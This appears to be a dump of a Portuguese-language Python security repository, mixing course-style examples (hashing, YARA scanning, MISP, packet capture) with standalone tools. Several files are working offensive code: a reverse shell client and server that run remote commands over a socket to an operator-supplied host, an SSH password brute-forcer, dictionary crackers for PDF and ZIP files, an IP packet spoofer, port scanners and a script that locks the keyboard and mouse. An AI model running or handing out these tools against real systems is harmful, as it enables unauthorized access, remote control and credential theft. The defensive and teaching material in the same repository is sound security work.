├── find_cookies ├── urls_to_verify.txt └── valid_cookies.py ├── test_ideas ├── read_file.py └── direct_list.txt ├── Python_para_CyberSecurity_Ataque_e_Defesa ├── 2_CAP_Scapy │ ├── exemplo_basico_criacao_pacote_tcp.py │ ├── captura_e_analise_pacotes_de_rede.py │ ├── spoofing_de_pacotes.py │ └── scanner_portas_tcp.py ├── 11_CAP_Hashlib │ ├── exemplo_geracao_hash_sha_512.py │ ├── exemplo_geracao_hash_sha_256.py │ ├── exemplo_verifica_integrid_sha_256.py │ └── exemplo_assint_digital_hmac_sha_256.py ├── 7_CAP_PyMISP │ ├── exemplo_config_inicial.py │ ├── exemplo_de_exportacao_eventos.py │ ├── exemplo_de_busca_eventos_MISP.py │ └── exemplo_de_criacao_eventos_na_MISP.py ├── 9_CAP_Requests_HTML │ ├── exemplo_de_coleta_dados_via_JavaScript_dinamico.py │ ├── exemplo_de_extracao_links_page_web.py │ ├── exemplo_crawler_web_mapear_estrutura_paginas.py │ └── exemplo_de_preenchimento_de_formulario_login.py ├── 10_CAP_Socket │ ├── exemplo_simples_port_scanner_tcp.py │ ├── exemplo_scanner_portas_UDP.py │ ├── exemplo_client_tcp_simples.py │ └── exemplo_servidor_tcp_simples.py ├── 6_CAP_PyShark │ ├── exemplo_captura_de_pacote_icmp.py │ ├── exemplo_analise_trafego_malicioso.py │ ├── exemplo_captura_pacote_http_dns.py │ └── exemplo_de_detec_tentativas_login_ftp.py ├── 3_CAP_Impacket │ ├── enumeracao_de_compartilhamentos_smb.py │ └── extracao_de_hashes_NTLM.py ├── 5_CAP_Cryptography │ ├── geracao_e_valicao_hashes_sha_256.py │ ├── criptograf_assimetric_RSA.py │ └── exemplo_de_cript_e_descript_AES.py ├── 8_CAP_yara_python │ ├── exemplo_de_escaneamento_de_arquivo.py │ ├── exemplo_de_escaneamento_de_process_memoria.py │ └── exemplo_de_escaneamento_de_diretorio.py └── 4_CAP_Paramiko │ ├── ataque_forca_bruta_simulados_paramiko.py │ ├── trasnferencia_segura_arquivo_via_sftp.py │ ├── exemplo_conexao_ssh_execucao_de_comand.py │ └── exemplo_reinicializacao_de_service_remot.py ├── block_mouse_key ├── block_mouse.py ├── app.py └── keyboards_use.py ├── x_frame_op_valid_mb └── xframe_validator.py ├── pdf_killer_pt ├── pdf_kill_pt.py └── wordlist_passwd.txt ├── dns_verify_pt ├── display_tool.py └── dns_enum_pt.py ├── zipkiller_pt ├── zipkil_pt.py └── understand_code.md ├── revershell_simple_pt ├── client_simple_pt.py ├── server_simple_pt.py └── understand_the_code.txt ├── subd_scan_mb └── crt_subd_scan.py ├── whois_mb └── whois_valid.py ├── find_links_in_host_pt └── crawler_links_pt.py ├── find_redirect_url └── find_redirect_url_pt.py ├── codes_shorts ├── simple_subdomain_scan.py └── simple_port_scanner.py ├── simple_scan_subdomain_pt └── subdomain_scan_python_todo_dia.py ├── client_server_send_file_pt ├── client_file.py ├── server_file.py └── understand_code.md ├── metadata_pt ├── find_metada_pt.py ├── understand_code_metada_pt.py └── understand_code_metada_pt.md ├── keylogger_simple_pt ├── keylog_simple_pt.py └── understand_script.md ├── simple_port_scan_pt └── port_scan_python_todo_dia.py ├── generate_password_pt └── generate_passwd.py ├── simple_scan_direct_pt └── director_scan_python_todo_dia.py ├── cve_finder ├── find_exploit.py └── cve_descriptions.py ├── securit_headers_mb └── secur_headers.py ├── hashkiller_pt ├── hashk_pt.py └── understand_code.md └── flag_secure_validator └── flag_secure_pt.py /find_cookies/urls_to_verify.txt: -------------------------------------------------------------------------------- 1 | ge.globo.com 2 | www.netflix.com 3 | hotmart.com 4 | www.formula1.com 5 | google.com -------------------------------------------------------------------------------- /test_ideas/read_file.py: -------------------------------------------------------------------------------- 1 | LIST_SUB = input("LIST_SUB: ") 2 | 3 | 4 | 5 | list_to_read = open(fr"{LIST_SUB}", 'r', encoding='utf-8').read().splitlines() 6 | print(list_to_read) -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/2_CAP_Scapy/exemplo_basico_criacao_pacote_tcp.py: -------------------------------------------------------------------------------- 1 | from scapy.all import IP, TCP 2 | 3 | # Cria um pacote com cabeçalho IP e TCP 4 | pacote = IP(dst='192.168.1.1') / TCP(dport=80, flags='S') 5 | 6 | # Exibe detalhes técnicos do pacote gerado 7 | pacote.show() 8 | -------------------------------------------------------------------------------- /block_mouse_key/block_mouse.py: -------------------------------------------------------------------------------- 1 | import pyautogui 2 | 3 | 4 | def block_mouse_for_time(): 5 | pyautogui.FAILSAFE = False 6 | 7 | try: 8 | largura_tela, altura_tela = pyautogui.size() 9 | 10 | x = largura_tela // 2 11 | y = altura_tela 12 | 13 | pyautogui.moveTo(x, y) 14 | except pyautogui.FailSafeException: 15 | pass 16 | finally: 17 | pyautogui.FAILSAFE = True 18 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/2_CAP_Scapy/captura_e_analise_pacotes_de_rede.py: -------------------------------------------------------------------------------- 1 | from scapy.all import sniff, IP, ICMP 2 | 3 | def packet_callback(packet): 4 | """Callback para exibir pacotes ICMP capturados.""" 5 | if packet.haslayer(ICMP): 6 | print(f"ICMP detectado -> Origem: {packet[IP].src} | Destino: {packet[IP].dst}") 7 | 8 | print("Iniciando sniffer... Pressione CTRL+C para interromper.") 9 | sniff(filter="icmp", prn=packet_callback, store=0) 10 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/11_CAP_Hashlib/exemplo_geracao_hash_sha_512.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | def generate_sha512(data): 4 | """Gera um hash SHA-512 a partir de uma string.""" 5 | sha512_hash = hashlib.sha512(data.encode()) 6 | return sha512_hash.hexdigest() 7 | 8 | if __name__ == "__main__": 9 | mensagem = input("Digite a mensagem para gerar o hash SHA-512: ") 10 | hash_gerado = generate_sha512(mensagem) 11 | print(f"Hash SHA-512 gerado: {hash_gerado}") 12 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/7_CAP_PyMISP/exemplo_config_inicial.py: -------------------------------------------------------------------------------- 1 | from pymisp import PyMISP 2 | 3 | # Defina a URL e a API Key da instância MISP 4 | MISP_URL = "https://misp.example.com" 5 | MISP_API_KEY = "SUA_CHAVE_API" 6 | USE_SSL = False # Define se a conexão deve utilizar SSL (False se não for seguro) 7 | 8 | try: 9 | misp = PyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=USE_SSL) 10 | print("Conexão com MISP estabelecida com sucesso!") 11 | except Exception as e: 12 | print(f"Erro ao conectar ao MISP: {e}") 13 | -------------------------------------------------------------------------------- /x_frame_op_valid_mb/xframe_validator.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | def xframe_valid_mb_pt(url): 5 | try: 6 | response = requests.head(url, allow_redirects=True) 7 | 8 | headers_resp = response.headers 9 | 10 | if "X-Frame-Options" in headers_resp: 11 | return True 12 | else: 13 | return False 14 | 15 | except requests.RequestException as e: 16 | return f"[ERROR] - {e}" 17 | 18 | 19 | 20 | 21 | 22 | print(xframe_valid_mb_pt('https://google.com.br')) -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/2_CAP_Scapy/spoofing_de_pacotes.py: -------------------------------------------------------------------------------- 1 | from scapy.all import IP, ICMP, send 2 | 3 | def spoof_packet(target_ip, spoof_ip): 4 | """Envia um pacote ICMP falsificado.""" 5 | packet = IP(src=spoof_ip, dst=target_ip) / ICMP() 6 | send(packet) 7 | print(f"Pacote ICMP enviado de {spoof_ip} para {target_ip}") 8 | 9 | if __name__ == "__main__": 10 | alvo = input("Digite o endereço IP alvo: ") 11 | ip_falso = input("Digite o endereço IP falso (spoof): ") 12 | spoof_packet(alvo, ip_falso) 13 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/11_CAP_Hashlib/exemplo_geracao_hash_sha_256.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | def generate_sha256(data): 4 | """Gera um hash SHA-256 a partir de uma string.""" 5 | # Cria um objeto hash SHA-256 6 | sha256_hash = hashlib.sha256(data.encode()) 7 | 8 | # Retorna o hash gerado em formato hexadecimal 9 | return sha256_hash.hexdigest() 10 | 11 | if __name__ == "__main__": 12 | mensagem = input("Digite a mensagem para gerar o hash SHA-256: ") 13 | hash_gerado = generate_sha256(mensagem) 14 | print(f"Hash SHA-256 gerado: {hash_gerado}") 15 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/9_CAP_Requests_HTML/exemplo_de_coleta_dados_via_JavaScript_dinamico.py: -------------------------------------------------------------------------------- 1 | from requests_html import HTMLSession 2 | 3 | def scrape_dynamic_content(url): 4 | """Coleta conteúdo gerado dinamicamente por JavaScript.""" 5 | session = HTMLSession() 6 | response = session.get(url) 7 | 8 | # Renderiza o JavaScript da página 9 | response.html.render(timeout=20) 10 | 11 | print(f"[+] Conteúdo dinâmico extraído:\n{response.html.text}") 12 | 13 | if __name__ == "__main__": 14 | url = input("Digite a URL da página que utiliza JavaScript: ") 15 | scrape_dynamic_content(url) 16 | -------------------------------------------------------------------------------- /block_mouse_key/app.py: -------------------------------------------------------------------------------- 1 | import keyboard 2 | from keyboards_use import keys, block_keyboard, wait_for_press 3 | from block_mouse import block_mouse_for_time 4 | import threading 5 | 6 | wait_keys_press_ = False 7 | 8 | wait_press_thread = threading.Thread(target=wait_for_press, args=(keyboard, wait_keys_press_)) 9 | wait_press_thread.start() 10 | 11 | for k in keys: 12 | block_keyboard(keyboard, k) 13 | if wait_keys_press_: 14 | break 15 | 16 | while not wait_keys_press_: 17 | block_mouse_for_time() 18 | if keyboard.is_pressed('esc+shift'): 19 | break 20 | 21 | 22 | wait_press_thread.join() 23 | 24 | 25 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/9_CAP_Requests_HTML/exemplo_de_extracao_links_page_web.py: -------------------------------------------------------------------------------- 1 | from requests_html import HTMLSession 2 | 3 | def extract_links(url): 4 | """Extrai e exibe links de uma página web.""" 5 | session = HTMLSession() # Inicia uma nova sessão HTTP 6 | response = session.get(url) # Realiza uma requisição GET para a URL fornecida 7 | 8 | print(f"[+] Links encontrados na página {url}:") 9 | 10 | # Coleta e exibe os links encontrados na página 11 | for link in response.html.absolute_links: 12 | print(link) 13 | 14 | if __name__ == "__main__": 15 | site = input("Digite a URL da página: ") 16 | extract_links(site) 17 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/10_CAP_Socket/exemplo_simples_port_scanner_tcp.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | 4 | def scan_port(ip, port): 5 | """Verifica se uma porta TCP está aberta.""" 6 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | sock.settimeout(1) 8 | 9 | resultado = sock.connect_ex((ip, port)) 10 | 11 | if resultado == 0: 12 | print(f"[+] Porta {port} aberta.") 13 | sock.close() 14 | 15 | if __name__ == "__main__": 16 | alvo = input("Digite o endereço IP alvo: ") 17 | portas = range(1, 1025) 18 | 19 | for porta in portas: 20 | thread = threading.Thread(target=scan_port, args=(alvo, porta)) 21 | thread.start() 22 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/10_CAP_Socket/exemplo_scanner_portas_UDP.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | def scan_udp(ip, port): 4 | """Verifica se uma porta UDP está aberta.""" 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 6 | sock.settimeout(1) 7 | 8 | try: 9 | sock.sendto(b"Teste", (ip, port)) 10 | data, _ = sock.recvfrom(1024) 11 | print(f"[+] Porta UDP {port} está aberta.") 12 | except socket.timeout: 13 | print(f"[-] Porta UDP {port} fechada ou filtrada.") 14 | finally: 15 | sock.close() 16 | 17 | if __name__ == "__main__": 18 | alvo = input("Digite o endereço IP alvo: ") 19 | porta = int(input("Digite a porta UDP a ser verificada: ")) 20 | 21 | scan_udp(alvo, porta) 22 | -------------------------------------------------------------------------------- /pdf_killer_pt/pdf_kill_pt.py: -------------------------------------------------------------------------------- 1 | import pikepdf 2 | from tqdm import tqdm 3 | import sys 4 | 5 | 6 | def kill_pdf(passwords_list, pdf_file): 7 | with tqdm(passwords_list, "Killyng PDF locked") as pbar: 8 | for passwd in pbar: 9 | try: 10 | with pikepdf.open(pdf_file, password=passwd) as pdf: 11 | pbar.clear() 12 | print("[!] PASSWORD:", passwd) 13 | return 14 | except pikepdf.PasswordError: 15 | continue 16 | 17 | 18 | if __name__ == "__main__": 19 | pdf_file = sys.argv[1] 20 | 21 | wordlist = sys.argv[2] 22 | 23 | passwords = [ line.strip() for line in open(wordlist) ] 24 | 25 | kill_pdf(passwords_list=passwords, pdf_file=pdf_file) 26 | 27 | -------------------------------------------------------------------------------- /dns_verify_pt/display_tool.py: -------------------------------------------------------------------------------- 1 | DEFAULT_LINK = 'Python Todo Dia - https://linktr.ee/pythontododay\n' 2 | BYBLACK = 'By - BL@CK K1NG' 3 | ASCII_PYTHON_TODO_DIA = fr""" 4 | /^\/^\ 5 | _|__| O| 6 | \/ /~ \_/ \ 7 | \____|__________/ \ 8 | \_______ \ 9 | `\ \ \ 10 | | | \ 11 | / / \ 12 | / / \ 13 | / / \ \ 14 | / / \ \ 15 | / / \ \ 16 | / / | | 17 | / / | \ 18 | /_____/ |_____\ 19 | 20 | ~~~~~~ P1th0n &ver1 D@y | DNS ENUMERATION {BYBLACK} ~~~~~~ 21 | """ 22 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/6_CAP_PyShark/exemplo_captura_de_pacote_icmp.py: -------------------------------------------------------------------------------- 1 | import pyshark 2 | 3 | def capture_icmp(interface): 4 | """Captura pacotes ICMP (Ping) em tempo real.""" 5 | print("[+] Iniciando captura de pacotes ICMP...") 6 | 7 | try: 8 | # Captura pacotes ICMP em tempo real 9 | capture = pyshark.LiveCapture(interface=interface, display_filter='icmp') 10 | 11 | # Exibe cada pacote ICMP detectado 12 | for packet in capture: 13 | print(f"[+] ICMP detectado - Origem: {packet.ip.src} | Destino: {packet.ip.dst}") 14 | 15 | except KeyboardInterrupt: 16 | print("[-] Captura interrompida pelo usuário.") 17 | 18 | except Exception as e: 19 | print(f"[-] Erro durante a captura: {e}") 20 | 21 | if __name__ == "__main__": 22 | interface = input("Digite a interface de rede (ex: eth0, wlan0): ") 23 | capture_icmp(interface) 24 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/3_CAP_Impacket/enumeracao_de_compartilhamentos_smb.py: -------------------------------------------------------------------------------- 1 | from impacket.smbconnection import SMBConnection 2 | 3 | def smb_enum(ip, username, password, domain=''): 4 | """Enumera os compartilhamentos SMB disponíveis em um sistema remoto.""" 5 | try: 6 | # Estabelece uma conexão SMB com a máquina alvo 7 | conn = SMBConnection(ip, ip) 8 | conn.login(username, password, domain) 9 | 10 | print(f"[+] Compartilhamentos disponíveis em {ip}:") 11 | for share in conn.listShares(): 12 | print(f" - {share.name}") 13 | conn.close() 14 | 15 | except Exception as e: 16 | print(f"[-] Falha na conexão SMB: {e}") 17 | 18 | if __name__ == "__main__": 19 | ip = input("Digite o endereço IP do servidor SMB: ") 20 | usuario = input("Digite o nome de usuário: ") 21 | senha = input("Digite a senha: ") 22 | 23 | smb_enum(ip, usuario, senha) 24 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/7_CAP_PyMISP/exemplo_de_exportacao_eventos.py: -------------------------------------------------------------------------------- 1 | from pymisp import PyMISP 2 | 3 | MISP_URL = "https://misp.example.com" 4 | MISP_API_KEY = "SUA_CHAVE_API" 5 | USE_SSL = False 6 | 7 | def exportar_eventos(misp, formato): 8 | """Exporta eventos da MISP no formato especificado.""" 9 | try: 10 | eventos = misp.download_last(format=formato) 11 | nome_arquivo = f"eventos_exportados.{formato}" 12 | 13 | with open(nome_arquivo, "wb") as arquivo: 14 | arquivo.write(eventos) 15 | 16 | print(f"[+] Eventos exportados com sucesso para {nome_arquivo}") 17 | except Exception as e: 18 | print(f"[-] Falha na exportação de eventos: {e}") 19 | 20 | if __name__ == "__main__": 21 | misp = PyMISP(MISP_URL, MISP_API_KEY, USE_SSL) 22 | formato = input("Digite o formato de exportação (ex: json, csv, xml): ") 23 | exportar_eventos(misp, formato) 24 | -------------------------------------------------------------------------------- /zipkiller_pt/zipkil_pt.py: -------------------------------------------------------------------------------- 1 | import pyzipper 2 | from tqdm import tqdm 3 | import sys 4 | 5 | def crack_zip(passwords_list, zip_file_path): 6 | with pyzipper.AESZipFile(zip_file_path) as zip_file: 7 | with tqdm(passwords_list, "Cracking ZIP file") as pbar: 8 | for passwd in pbar: 9 | try: 10 | zip_file.extractall(pwd=passwd.encode()) 11 | pbar.clear() 12 | print("[!] PASSWORD:", passwd) 13 | return 14 | except (RuntimeError, pyzipper.BadZipFile, pyzipper.LargeZipFile): 15 | continue 16 | 17 | if __name__ == "__main__": 18 | zip_file_path = sys.argv[1] 19 | wordlist_path = sys.argv[2] 20 | 21 | passwords = [line.strip() for line in open(wordlist_path, "r")] 22 | 23 | crack_zip(passwords_list=passwords, zip_file_path=zip_file_path) 24 | 25 | print("[!] Password not found, try another wordlist.") 26 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/5_CAP_Cryptography/geracao_e_valicao_hashes_sha_256.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives import hashes 2 | 3 | def generate_hash(data): 4 | """Gera um hash SHA-256 para uma string.""" 5 | digest = hashes.Hash(hashes.SHA256()) 6 | digest.update(data.encode()) 7 | return digest.finalize().hex() 8 | 9 | def verify_hash(data, expected_hash): 10 | """Verifica se um hash gerado corresponde ao valor esperado.""" 11 | generated_hash = generate_hash(data) 12 | if generated_hash == expected_hash: 13 | print("[+] O hash é válido!") 14 | else: 15 | print("[-] O hash NÃO é válido!") 16 | 17 | if __name__ == "__main__": 18 | mensagem = input("Digite a mensagem para gerar o hash: ") 19 | hash_gerado = generate_hash(mensagem) 20 | print(f"\nHash gerado: {hash_gerado}") 21 | 22 | hash_verificacao = input("\nDigite o hash para verificar: ") 23 | verify_hash(mensagem, hash_verificacao) 24 | -------------------------------------------------------------------------------- /revershell_simple_pt/client_simple_pt.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import os 3 | import subprocess 4 | import sys 5 | 6 | SERVER_HOST = sys.argv[1] 7 | SERVER_PORT = 4500 8 | BUFFER_SIZE = 1024 * 128 9 | SEPARATOR = "" 10 | 11 | sockt_ = socket.socket() 12 | sockt_.connect((SERVER_HOST, SERVER_PORT)) 13 | 14 | cwd = os.getcwd() 15 | sockt_.send(cwd.encode()) 16 | 17 | while True: 18 | 19 | command = sockt_.recv(BUFFER_SIZE).decode() 20 | splited_command = command.split() 21 | if command.lower() == "exit": 22 | break 23 | 24 | if splited_command[0].lower() == "cd": 25 | 26 | try: 27 | os.chdir(' '.join(splited_command[1:])) 28 | except FileNotFoundError as e: 29 | 30 | output = str(e) 31 | else: 32 | output = "" 33 | else: 34 | output = subprocess.getoutput(command) 35 | 36 | cwd = os.getcwd() 37 | 38 | message = f"{output}{SEPARATOR}{cwd}" 39 | sockt_.send(message.encode()) 40 | 41 | sockt_.close() -------------------------------------------------------------------------------- /subd_scan_mb/crt_subd_scan.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | def crt_sub(host): 5 | 6 | try: 7 | response = requests.get(f"https://crt.sh/?q={host}", timeout=4) 8 | 9 | HTML = response.text 10 | DOMAINS = [] 11 | 12 | for line in HTML.splitlines(): 13 | if '' in line and not ('', '').replace('', '').replace('
', '\n').strip() 15 | 16 | if not new_line in DOMAINS: 17 | DOMAINS.append(new_line) 18 | 19 | return DOMAINS 20 | 21 | except Exception as e: 22 | return f"[ERROR] - {e}\n[//] Verify your input please\nExample - google.com" 23 | 24 | if __name__ == "__main__": 25 | 26 | HOST = input("[$] HOST: ") 27 | 28 | print("\n[!] Executindo search in crt.sh [!]\n[!!] If anything data return, please consult again [!!]\n") 29 | 30 | RESULT = crt_sub(host=HOST) 31 | 32 | for host in RESULT: 33 | print(host) -------------------------------------------------------------------------------- /whois_mb/whois_valid.py: -------------------------------------------------------------------------------- 1 | import whois 2 | 3 | def domain_is_true(domain): 4 | whois_ = whois.whois(domain) 5 | 6 | if bool(whois_.domain_name): 7 | return whois_ 8 | else: 9 | return False 10 | 11 | 12 | def informations_about_domain(domain_name): 13 | w = domain_is_true(domain=domain_name) 14 | if w: 15 | print(f'\n=============================={domain_name}==============================') 16 | print('DOMAIN REGISTER: ', w.registrar) 17 | print('WHOIS SERVER: ', w.whois_server) 18 | print('DOMAIN CREATION DATE: ', w.creation_date) 19 | print('EXPIRATION DATE: ', w.expiration_date) 20 | print(w) 21 | print(f'=============================={domain_name}==============================\n') 22 | 23 | 24 | if __name__ == "__main__": 25 | 26 | host = input('[$] HOST: ') 27 | 28 | print("\n[!] Executindo whois validator [!]\n[!!] If anything data return, please consult again [!!]\n") 29 | 30 | informations_about_domain(domain_name=host) -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/5_CAP_Cryptography/criptograf_assimetric_RSA.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.asymmetric import rsa 2 | from cryptography.hazmat.primitives import serialization 3 | 4 | # Geração de chave privada RSA de 2048 bits 5 | private_key = rsa.generate_private_key( 6 | public_exponent=65537, 7 | key_size=2048 8 | ) 9 | 10 | # Serializando a chave privada 11 | with open("private_key.pem", "wb") as key_file: 12 | key_file.write(private_key.private_bytes( 13 | encoding=serialization.Encoding.PEM, 14 | format=serialization.PrivateFormat.TraditionalOpenSSL, 15 | encryption_algorithm=serialization.NoEncryption() 16 | )) 17 | 18 | # Gerar e exportar a chave pública 19 | public_key = private_key.public_key() 20 | with open("public_key.pem", "wb") as key_file: 21 | key_file.write(public_key.public_bytes( 22 | encoding=serialization.Encoding.PEM, 23 | format=serialization.PublicFormat.SubjectPublicKeyInfo 24 | )) 25 | 26 | print("Chaves RSA geradas com sucesso!") 27 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/8_CAP_yara_python/exemplo_de_escaneamento_de_arquivo.py: -------------------------------------------------------------------------------- 1 | import yara 2 | 3 | def scan_file(rule_path, file_path): 4 | """Escaneia um arquivo usando uma regra YARA.""" 5 | try: 6 | # Compila a regra YARA 7 | rules = yara.compile(filepath=rule_path) 8 | 9 | # Realiza a verificação do arquivo 10 | matches = rules.match(file_path) 11 | 12 | # Exibe o resultado 13 | if matches: 14 | print(f"[+] Ameaça detectada no arquivo {file_path}") 15 | for match in matches: 16 | print(f" - Regra correspondente: {match.rule}") 17 | else: 18 | print(f"[-] Nenhuma ameaça detectada no arquivo {file_path}") 19 | 20 | except Exception as e: 21 | print(f"[-] Erro durante a varredura: {e}") 22 | 23 | if __name__ == "__main__": 24 | regra = input("Digite o caminho da regra YARA: ") 25 | arquivo = input("Digite o caminho do arquivo a ser analisado: ") 26 | 27 | scan_file(regra, arquivo) 28 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/7_CAP_PyMISP/exemplo_de_busca_eventos_MISP.py: -------------------------------------------------------------------------------- 1 | from pymisp import PyMISP 2 | 3 | MISP_URL = "https://misp.example.com" 4 | MISP_API_KEY = "SUA_CHAVE_API" 5 | USE_SSL = False 6 | 7 | def buscar_evento(misp, termo_busca): 8 | """Busca eventos na MISP relacionados a um termo específico.""" 9 | try: 10 | resultado = misp.search(controller='events', value=termo_busca) 11 | eventos = resultado.get('response', []) 12 | 13 | if eventos: 14 | print(f"[+] {len(eventos)} eventos encontrados para: {termo_busca}") 15 | for evento in eventos: 16 | print(f" - Evento ID: {evento['Event']['id']} | Descrição: {evento['Event']['info']}") 17 | else: 18 | print("[-] Nenhum evento encontrado para este termo.") 19 | 20 | except Exception as e: 21 | print(f"[-] Falha na busca: {e}") 22 | 23 | if __name__ == "__main__": 24 | misp = PyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=USE_SSL) 25 | termo = input("Digite o termo de busca: ") 26 | buscar_evento(misp, termo) 27 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/10_CAP_Socket/exemplo_client_tcp_simples.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | def client_tcp(host, port): 4 | """Cliente TCP que se conecta a um servidor e envia uma mensagem.""" 5 | try: 6 | # Cria um socket TCP 7 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | # Conecta ao host e porta especificados 10 | client.connect((host, port)) 11 | 12 | # Envia uma mensagem para o servidor 13 | mensagem = "Olá, servidor!" 14 | client.send(mensagem.encode()) 15 | 16 | # Recebe a resposta do servidor 17 | resposta = client.recv(1024).decode() 18 | print(f"Resposta do servidor: {resposta}") 19 | 20 | # Fecha a conexão 21 | client.close() 22 | 23 | except Exception as e: 24 | print(f"Erro na conexão: {e}") 25 | 26 | if __name__ == "__main__": 27 | ip_servidor = input("Digite o IP do servidor: ") 28 | porta_servidor = int(input("Digite a porta do servidor: ")) 29 | 30 | client_tcp(ip_servidor, porta_servidor) 31 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/7_CAP_PyMISP/exemplo_de_criacao_eventos_na_MISP.py: -------------------------------------------------------------------------------- 1 | from pymisp import PyMISP, MISPEvent 2 | 3 | MISP_URL = "https://misp.example.com" 4 | MISP_API_KEY = "SUA_CHAVE_API" 5 | USE_SSL = False 6 | 7 | def criar_evento(misp, categoria, info, atributo, tipo): 8 | """Cria um evento na MISP com um IoC associado.""" 9 | 10 | # Cria um novo evento na plataforma MISP 11 | evento = MISPEvent() 12 | evento.info = info 13 | evento.add_attribute(atributo, tipo=tipo, category=categoria) 14 | 15 | try: 16 | resultado = misp.add_event(evento) 17 | print(f"[+] Evento criado com sucesso. ID do evento: {resultado['Event']['id']}") 18 | except Exception as e: 19 | print(f"[-] Falha ao criar o evento: {e}") 20 | 21 | if __name__ == "__main__": 22 | misp = PyMISP(MISP_URL, MISP_API_KEY, USE_SSL) 23 | categoria = "Network activity" 24 | informacao = "Atividade suspeita detectada na rede" 25 | atributo = "192.168.1.100" 26 | tipo = "ip-dst" 27 | 28 | criar_evento(misp, categoria, informacao, atributo, tipo) 29 | -------------------------------------------------------------------------------- /revershell_simple_pt/server_simple_pt.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | from fast import ascii 4 | print(ascii) 5 | 6 | SERVER_HOST = "0.0.0.0" 7 | SERVER_PORT = 4500 8 | BUFFER_SIZE = 1024 * 128 9 | 10 | SEPARATOR = "" 11 | 12 | sockt_ = socket.socket() 13 | 14 | sockt_.bind((SERVER_HOST, SERVER_PORT)) 15 | sockt_.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 16 | sockt_.listen(5) 17 | 18 | print(f"[!] LISTENING IN {SERVER_HOST}:{SERVER_PORT} [!]") 19 | 20 | client_socket, client_address = sockt_.accept() 21 | print(f"\n[!] {client_address[0]}:{client_address[1]} CONNNECTED\n") 22 | 23 | cwd = client_socket.recv(BUFFER_SIZE).decode() 24 | print("[#] YOU ARE HERE:", cwd) 25 | 26 | while True: 27 | command = input(f"{cwd} $> ") 28 | if not command.strip(): 29 | continue 30 | 31 | client_socket.send(command.encode()) 32 | if command.lower() == "exit": 33 | break 34 | 35 | output = client_socket.recv(BUFFER_SIZE).decode() 36 | 37 | results, cwd = output.split(SEPARATOR) 38 | 39 | print(results) 40 | 41 | client_socket.close() 42 | 43 | sockt_.close() -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/4_CAP_Paramiko/ataque_forca_bruta_simulados_paramiko.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | 3 | def brute_force_ssh(ip, username, password_list): 4 | """Simula um ataque de força bruta contra SSH.""" 5 | for password in password_list: 6 | try: 7 | client = paramiko.SSHClient() 8 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 9 | client.connect(ip, username=username, password=password, timeout=2) 10 | 11 | print(f"[+] Senha encontrada: {password}") 12 | client.close() 13 | break 14 | except paramiko.AuthenticationException: 15 | print(f"[-] Tentativa falhou com senha: {password}") 16 | except Exception as e: 17 | print(f"[-] Erro na conexão: {e}") 18 | 19 | if __name__ == "__main__": 20 | ip = input("Digite o endereço IP do alvo: ") 21 | usuario = input("Digite o nome de usuário: ") 22 | senha_lista = ["123456", "senha123", "admin", "root", "qwerty", "password"] 23 | 24 | brute_force_ssh(ip, usuario, senha_lista) 25 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/8_CAP_yara_python/exemplo_de_escaneamento_de_process_memoria.py: -------------------------------------------------------------------------------- 1 | import yara 2 | import psutil # Biblioteca para manipulação de processos 3 | 4 | def scan_memory(rule_path): 5 | """Escaneia processos em execução utilizando regras YARA.""" 6 | try: 7 | # Compila a regra YARA 8 | rules = yara.compile(filepath=rule_path) 9 | 10 | # Percorre processos em execução 11 | for process in psutil.process_iter(['pid', 'name']): 12 | try: 13 | with open(f"/proc/{process.info['pid']}/mem", 'rb') as mem_file: 14 | matches = rules.match(data=mem_file.read()) 15 | if matches: 16 | print(f"[+] Processo suspeito encontrado: {process.info['name']} (PID: {process.info['pid']})") 17 | except (PermissionError, FileNotFoundError): 18 | continue 19 | except Exception as e: 20 | print(f"[-] Erro durante a análise de memória: {e}") 21 | 22 | if __name__ == "__main__": 23 | regra = input("Digite o caminho da regra YARA: ") 24 | scan_memory(regra) 25 | 